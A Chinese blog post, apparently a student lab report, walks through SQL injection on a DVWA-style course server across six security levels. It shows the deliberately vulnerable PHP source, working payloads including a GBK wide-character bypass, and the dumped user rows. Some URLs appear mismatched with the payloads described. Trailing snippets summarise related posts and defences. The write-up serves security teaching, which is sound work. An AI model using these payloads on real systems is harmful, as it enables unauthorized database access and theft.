SQL注入实验

最新推荐文章于 2025-10-10 17:20:22 发布
原创 最新推荐文章于 2025-10-10 17:20:22 发布 · 6.6k 阅读 · 16 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql注入 #信息安全

本文详细记录了一次SQL注入实验,从安全等级1到5逐步破解的过程,包括注入方法和原理分析,展示了如何利用布尔连接符、宽字符注入等技巧绕过防护。

信息安全实验 SQL Injection

一.实验内容

1.Finish all six challenge on the website,or give the reason why the protection is unbreakable(need an experiment report ).

2(Extended work).Tell me why [input = a’ or ‘1=1’ or ‘1=1] doesn’t work on the login website in your experiment report.

二.实验过程

  • 登陆实验网页:http://202.38.79.49:8888/login.php
    登陆界面如下:
    p1
  • 尝试输入默认用户名和用户密码:
    Username: admin
    Password: admin
  • 成功登入系统!系统界面如下:
    p2
    1.设置安全等级为1:Security Level = 1.
    注入界面如下:
    p3
  • 点击右下角的View Source,查看PHP连接后台数据库的源代码:
<?php     

if(isset($_GET['Submit'])){ 

    // Retrieve data 

    $id = $_GET['id']; 

    $getid = "SELECT first_name, last_name FROM users WHERE user_id = $id"; 
    $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' ); 

    $num = mysql_numrows($result); 

    $i = 0; 

    while ($i < $num) { 

        $first = mysql_result($result,$i,"first_name"); 
        $last = mysql_result($result,$i,"last_name"); 

        echo '<pre>'; 
        echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last; 
        echo '</pre>'; 

        $i++; 
    } 
} 
?>
  • 根据以上代码可知,可以利用$id变量的漏洞进行sql注入,向User ID文本框中输入查询字符串1=1 or 1=1,URL网址变成了http://202.38.79.49:8888/vulnerabilities/sqli/?id=1=1+or+1=1&Submit=Submit,获得如下数据库信息:
ID: 1=1 or 1=1
First name: admin
Surname: admin

ID: 1=1 or 1=1
First name: Gordon
Surname: Brown

ID: 1=1 or 1=1
First name: Hack
Surname: Me

ID: 1=1 or 1=1
First name: Pablo
Surname: Picasso

ID: 1=1 or 1=1
First name: Bob
Surname: Smith

Level 1注入成功。

2.设置安全等级为2:Security Level = 2.

  • 点击右下角的View Source,查看PHP连接后台数据库的源代码:
<?php     

if(isset($_GET['Submit'])){ 

    // Retrieve data 

    $id = $_GET['id']; 

    $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; 
    $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' ); 

    $num = mysql_numrows($result); 

    $i = 0; 

    while ($i < $num) { 

        $first = mysql_result($result,$i,"first_name"); 
        $last = mysql_result($result,$i,"last_name"); 

        echo '<pre>'; 
        echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last; 
        echo '</pre>'; 

        $i++; 
    } 
} 
?>
  • 将Security Level = 2的代码与Security Level = 1的代码进行比较, 发现唯一的区 别就是1的$getid变量中是WHERE user_id = $id,而2的$getid变量中是WHERE user_id = '$id',多了单引号。于是可以将输入查询串改为abc' or '1=1,将单引号过 滤掉。URL网址变成了http://202.38.79.49:8888/vulnerabilities/sqli/?id=abc'+or+'1=1&Submit=Submit,获得如下数据库信息:
ID: abc' or '1=1
First name: admin
Surname: admin

ID: abc' or '1=1
First name: Gordon
Surname: Brown

ID: abc' or '1=1
First name: Hack
Surname: Me

ID: abc' or '1=1
First name: Pablo
Surname: Picasso

ID: abc' or '1=1
First name: Bob
Surname: Smith

Level 2注入成功。

3.设置安全等级为3:Security Level = 3.

  • 点击右下角的View Source,查看PHP连接后台数据库的源代码:
<?php     

if(isset($_GET['Submit'])){ 

    // Retrieve data 

    $id = $_GET['id']; 
    if (preg_match('/ |\'/',$id))
    {
        echo die('<pre>' . 'Contain invalid characters.' . '</pre>');
        $num = 0; 
    }
    else
    {

        $getid = "SELECT first_name, last_name FROM users WHERE user_id = $id"; 
        $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' ); 

        $num = mysql_numrows($result); 
    }

        $i = 0; 

        while ($i < $num) { 

            $first = mysql_result($result,$i,"first_name"); 
            $last = mysql_result($result,$i,"last_name"); 

            echo '<pre>'; 
            echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last; 
            echo '</pre>'; 

            $i++; 
        } 
} 
?>
  • 将Security Level = 3的代码与Security Level = 1和2的代码进行比较,发现3的代码多了一段正则表达式的判定if (preg_match('/ |\'/',$id)),这个正则表达式的含义是,如果$id变量中含有空格或者单引号,则输出 错误信息'Contain invalid characters.。于是我们尝试不用空格和单引号进行注入, 将输入查询串改为1||1,利用||的布尔连接符,实施注入。
  • 此时,URL网址变成了 http://202.38.79.49:8888/vulnerabilities/sqli/?id=1=1+or+1=1&Submit=Submit, 获得如下数据库信息:
ID: 1||1
First name: admin
Surname: admin

ID: 1||1
First name: Gordon
Surname: Brown

ID: 1||1
First name: Hack
Surname: Me

ID: 1||1
First name: Pablo
Surname: Picasso

ID: 1||1
First name: Bob
Surname: Smith

Level 3注入成功。

4.设置安全等级为4:Security Level = 4.

  • 点击右下角的View Source,查看PHP连接后台数据库的源代码:
<?php 

if (isset($_GET['Submit'])) { 

    // Retrieve data 

    $id = $_GET['id']; 
    $id = mysql_real_escape_string($id); 

    $getid = "SELECT first_name, last_name FROM users WHERE user_id = $id"; 

    $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' ); 

    $num = mysql_numrows($result); 

    $i=0; 

    while ($i < $num) { 

        $first = mysql_result($result,$i,"first_name"); 
        $last = mysql_result($result,$i,"last_name"); 

        echo '<pre>'; 
        echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last; 
        echo '</pre>'; 

        $i++; 
    } 
} 
?>
  • 将Security Level = 4的代码与Security Level = 1的代码进行比较,发现4的代码多 了一段语句:$id = mysql_real_escape_string($id);,函数mysql_real_escape_string主要是为了数据库防注入、以及语句正确性等需要,将读写语句中的特殊字符进行转换: \x00 \n \r \ ' " \x1a,如果成功,则该函数返回被转义的字符串。如果失败,则返回 false。但最终写入到数据库中的内容,依旧是转义前的,也就是当读出来的时候,依旧是原来转义前的内容。所以,若注入语句中不包含特殊符号,依然可以成功注入,利用和Level1中相同的语句1=1 or 1=1进行注入,此时,URL网址变成了http://202.38.79.49:8888/vulnerabilities/sqli/?id=1||1&Submit=Submit,获得如下数据库信息:
ID: 1=1 or 1=1
First name: admin
Surname: admin

ID: 1=1 or 1=1
First name: Gordon
Surname: Brown

ID: 1=1 or 1=1
First name: Hack
Surname: Me

ID: 1=1 or 1=1
First name: Pablo
Surname: Picasso

ID: 1=1 or 1=1
First name: Bob
Surname: Smith

Level 4注入成功。

5.设置安全等级为5:Security Level = 5.

  • 点击右下角的View Source,查看PHP连接后台数据库的源代码:
<?php 

if (isset($_GET['Submit'])) { 

    // Retrieve data 

    mysql_query('SET NAMES gbk');

    $id = $_GET['id']; 
    $id = mysql_real_escape_string($id); 

    $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; 
    echo '<a>' . $getid . '</a>';

    $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' ); 

    $num = mysql_numrows($result); 

    $i=0; 

    while ($i < $num) { 

        $first = mysql_result($result,$i,"first_name"); 
        $last = mysql_result($result,$i,"last_name"); 

        echo '<pre>'; 
        echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last; 
        echo '</pre>'; 

        $i++; 
    } 
} 
?>
  • 将Security Level = 5的代码与Security Level = 4的代码进行比较,发现5的代码多 了一段语句:mysql_query('SET NAMES gbk');,且变量$getid中的$id变量两边和Level 2一样是有单引号的。以上语句将编码设置为gbk,我们可以在此利用宽字符注入的方式来获取数据库内容。设计$id值为abc%df%27%20or%201=1%20%23,并修改url地址为http://202.38.79.49:8888/vulnerabilities/sqli/?id=abc%df%27%20or%201=1%20%23&Submit=Submit,获得如下数据库信息:
    p4
    以上注入的原理是利用了%df和经过转义函数mysql_real_escape_string()编码之后带入了字符’\’的编码%5c形成宽字符编码%df%5c,成功地吃掉了%5c,得以让%27的单引号闭合成功。

    Level 5注入成功。


6.设置安全等级为Security Level = 6.
  • 点击右下角的View Source,查看PHP连接后台数据库的源代码:
<?php     

if (isset($_GET['Submit'])) { 

    // Retrieve data 

    $id = $_GET['id']; 
    $id = stripslashes($id); 
    $id = mysql_real_escape_string($id); 

    if (is_numeric($id)){ 

        $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; 
        $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' ); 

        $num = mysql_numrows($result); 

        $i=0; 

        while ($i < $num) { 

            $first = mysql_result($result,$i,"first_name"); 
            $last = mysql_result($result,$i,"last_name"); 

            echo '<pre>'; 
            echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last; 
            echo '</pre>'; 

            $i++; 
        } 
    } 
} 
?>
  • 将Security Level = 6的代码与Security Level = 4的代码进行比较,发现6的代码多 了一段语句:$id = stripslashes($id);,stripslashes() 函数删除由mysql_real_escape_string() 函数添加的反斜杠,如果有两个连续的反斜线 ,则只去掉一个。
  • 这里为什么要有这个操作呢?这是由于在high级别下,PHP的magic_quotes_gpc被自动设为on,magic_quotes_gpc被称为魔术引号,开启它之后,可以对所有的GET、POST和COOKIE传值的数据自动运行addslashes()函数,所以这里才要使用stripslashes()函数去除。magic_quotes_gpc功能在PHP5.3.0中已经废弃并且在5.4.0中已经移除了,这也是为什么在DVWA中一直强调使用mysql_real_escape_string()函数进行过滤的原因吧。
    另外还可以发现,在执行查询之前,使用了if语句进行判断,判断的条件是一个is_numeric()函数,也就是判断用户输入的数据是否是数字型,只要不是数字型就一概报错,这样那些and、or、select等语句都无法执行了。
    最后在具体执行查询时,还要求$id是字符型。经过这样重重防护,这样页面就很难注入了。
  • 所以Level 6的后台代码在本实验中难以实施注入。
  • (补充:试试将1 or 1’语句转换为16进制0x31206f722031带入数据库进行查询,或许有效)。
SQL注入测试实验
weixin_43488742的博客
03-04 6265
SQL注入漏洞 1、工具安装 phpstudy与DVWA安装配置(默认用户名:admin,默认密码:password) (1)软件安装教程:https://datutu.blog.youkuaiyun.com/article/details/109323067?spm=1001.2101.3001.6650.1&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1.pc_relevant_paycol
DVWA环境【文件上传漏洞】安全low级别存在bug?
Bruce_xiaowei的博客
08-15 1396
大家好,这是我的第篇博客文章。与大家分享下我遇到的问题,希望对您有所启发。近期为了做渗透测试实验方便,在两台主机的虚拟机系统之间上传文件,安全级别low,上传.txt文本文件。结果无意间发现个奇怪的问题,比方说我当时在网上粘贴两条命令,然后用notepad记事本存成txt文件,命名文件名"开启关闭3389端口.txt",结果报错。我上传其他txt文件都没问题。后来用owasp zap抓包,对比成功发送的请求和这个失败的请求,没发现任何异常。改用kali linux上传样报错。后来百思不...
SQL注入攻防实验实验环境:Kali Linux;Windows Server 2003】
qq_62199249的博客
11-05 1565
(3)通过Kali内置的SQL Map进行自动注入,首先打开Kali的终端,进入SQL Map模块,然后将DVWA进入到SQL Injection模块,将URL地址复制下来输入到终端,然后加入Cookie,在选择要查询的内容,首先查询所有数据库名,因此要在尾部加上--dbs,查询结果如下。(10)由此可得到用户的账户名称和加密过的口令,该口令通过观察可知为MD5加密,通过解密工具解密后就可得到相应口令,Low级的手工注入完成。(4) 查询某个数据库下的所有表名(dvwa),指令如下,如图查询到两个表名。
SQL注入攻击实验
最新发布
zdsxc_的博客
10-10 936
通过此次实验,我们利用SQL注入的方法实现了相关的简易攻击,进步理解了数据库漏洞的危害性,同时明白了web开发过程中严谨性的重要性,熟悉了web开发中开发人员常犯的常规错误。
sql注入攻击实验
05-25
sql注入攻击,先自己搭建个网站,链接数据库必须用Sa链接
Sql注入实验
Nocker888的博客
11-11 582
Sql注入实验Sql 注入 实验 总结 青春经典当即永不再赎 不怕自己笨,就怕那些比自己笨的人比自己还要努力 Sql 注入 实验 在得到靶机的情况下,寻找带有参数的地方就有定有注入点。 开干,首先是判断注入点 payload如下: // 数字型判断 ?id=1 and 1=1 ?id=1 and 1=2 // 字符型判断 ?id=1' and...
实验——SQL注入
weixin_44870846的博客
07-28 649
目录 利用SQL注入,将cms的后台管理的密码和用户破解出来 判断是否有回显 判断数据库是否有报错 判断是字符型还是数字型 判断是否有布尔类型状态 判断列数 判断显示位 输出数据库的名字 查询所有的表名 字段编码不同出现问题的解决方法 获取字段名 获得字段内容 MD5解密 利用SQL注入,将cms的后台管理的密码和用户破解出来 目标系统:cms网站 操作工具:hackbar 判断是否有回显 根据变换id,数据库中的内容是否回显在网页中判断 http://192..
精选资源
常规漏洞利用-sql注入实验指导书.pdf
08-03
在DVWA界面左侧选择SQL Injection标签页,进入SQL注入实验页面。在该页面,我们可以对SQL注入进行各种实验操作。 3. 判断SQL注入类型 实验首先要判断注入类型,即确定当前的注入点是字符型还是数字型。通过向userid...
sql注入实验
11-28
### SQL注入实验知识点详解 #### 实验背景及目标 **SQL注入**是种常见的网络安全威胁,主要针对使用结构化查询语言(SQL)进行数据处理的应用程序。本次实验旨在深入理解SQL注入攻击原理及其防御措施,通过实际...
Web安全实践-SQL注入实验指南(Sqli-labs)
12-08
Web安全实践者通过执行SQL注入实验,能够深入理解SQL注入的原理,学习如何发现潜在的注入点,以及如何有效防护此类攻击。本文以sqli-labs为例,详细介绍了SQL注入实验的各个阶段,包括识别注入类型、猜测字段数、...
SQL注入攻击实验报告
05-07
SQL注入攻击实验报告,自己写了试验的网站,举了些基本的攻击和防御方法,有xp_cmdshell的执行,用的是sqlserver 2005
精选资源
sql注入实验报告PDF
12-12
SQL注入种常见的网络攻击手段,它利用了应用程序对用户输入的处理不当,使得攻击者可以向后端数据库注入恶意的SQL代码。当数据库查询语句以不安全的方式从用户输入构建时,攻击者可以利用输入字段插入或修改SQL...
网络信息安全实训【SQL注入
@MIKE小助手
06-17 1045
🛢️SQL注入测试 ⭕实例代码,仅供测试⭕【1】搭建数据库基本环境 三、创建册用户页面 【1】先进入网页的根目录 【2】创建网页文件 打开效果: 打开效果: 【1】插入数据前数据库验证 【2】开始创建两个可用于实验的数据 【3】再次查看数据库【4】尝试正常登录检查 【5】使用正常的账号密码进行登录测试打开登录页面开始注入非法字符实现原理:直接恶意释原代码里面的数据库查询语句中的查询密码这项,导致密码验证直接失效实现无密码登录 这样就直接不需要密码就可以直接能够成功登录了。实现原理:直接.
网络安全——SQL注入实验
网络工程
12-12 5862
1、掌握SQL注入的原理。2、通过开源网站渗透平台DVWA实战,掌握常见的SQL注入方法。3、具体内容:1)学习配置开源网站渗透平台DVWA(Damn Vulnerable Web Application)。2)学习常见的SQL语句:create、select、drop、union等。3)学习相关SQL注入方法并在实验平台验证
简单SQL注入实验
qq_43518594的博客
10-30 3871
、什么是SQL注入 SQL攻击(英语:SQL injection),简称注入攻击,是发生于应用程序之数据库层的安全漏洞。简而言之,是在输入的字符串之中注入SQL指令,在设计不良的程序当中忽略了检查,那么这些注入进去的指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破坏或是入侵。 二、SQL注入原理 情况下,用户登录的SQL语句为select * from users where user=$username and pw=$password ;这里的username和password分别
SQL注入实验-- SQLi-Labs
m0_51427256的博客
11-19 1043
​1、安装phpstudy 1)下载:https://www.xp.cn/ 2)键式安装:右下角自定义可以更改安装路径 3)打开apache和mysql
【网络攻防技术】实验八——SQL注入实验
qq_45755706的博客
03-01 7670
文章目录实验题目二、实验步骤及结果Task 1: Get Familiar with SQL StatementsTask 2: SQL Injection Attack on SELECT StatementTask 2.1: SQL Injection Attack from webpage.Task 2.2: SQL Injection Attack from command line.Task 2.3: Append a new SQL statement.Task 3: SQL Injecti
SQL 注入实验
06-14
### SQL 注入实验教程与防御方法 #### 实验教程 SQL注入实验旨在帮助学习者了解SQL注入攻击的工作原理以及如何利用工具检测系统中的漏洞。通过此实验,可以掌握常用的端口和漏洞扫描工具,并提升对SQL注入漏洞危害的认识[^1]。 以下是SQL注入实验的核心内容: - **目标检测**:使用端口和漏洞扫描工具(如Nmap、OpenVAS等)对目标系统进行扫描,发现开放的服务和可能存在的漏洞。 - **SQL注入测试**:尝试构造恶意的SQL语句,以验证目标系统是否存在SQL注入漏洞。例如,通过输入单引号 `'` 或其他特殊字符来观察系统的响应行为。 - **分析结果**:记录并分析实验过程中发现的漏洞,明确其成因及潜在危害。 #### 防御方法 为了有效防御SQL注入攻击,可以从以下几个方面入手: 1. **参数化查询** 使用参数化查询或预编译语句,确保用户输入的内容不会被直接解析为SQL代码。例如,在Python中可以使用以下代码实现安全查询: ```python import sqlite3 conn = sqlite3.connect('example.db') cursor = conn.cursor() username = "admin" password = "password123" # 参数化查询 cursor.execute("SELECT * FROM users WHERE username=? AND password=?", (username, password)) results = cursor.fetchall() ``` 2. **输入验证** 对用户输入的数据进行严格的验证和过滤,确保只允许合法的输入。例如,如果应用程序只需要用户输入数字,可以使用以下代码进行白名单过滤[^3]: ```python if not username.isdigit(): raise ValueError('Invalid username') ``` 3. **最小权限原则** 确保数据库用户的权限设置合理,仅授予其完成任务所需的最低权限。例如,避免使用具有管理员权限的账户连接数据库。 4. **空格绕过防御** 在某些情况下,攻击者可能通过替换空格来绕过简单的过滤规则。可以通过正则表达式或其他方法检测并阻止这些变种输入[^2]。 5. **错误信息控制** 避免在生产环境中显示详细的错误信息,防止攻击者利用这些信息推测数据库结构。 6. **定期更新与审计** 定期更新数据库管理系统及相关软件版本,修补已知漏洞。同时,对应用程序和数据库进行安全审计,及时发现并修复潜在问题。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值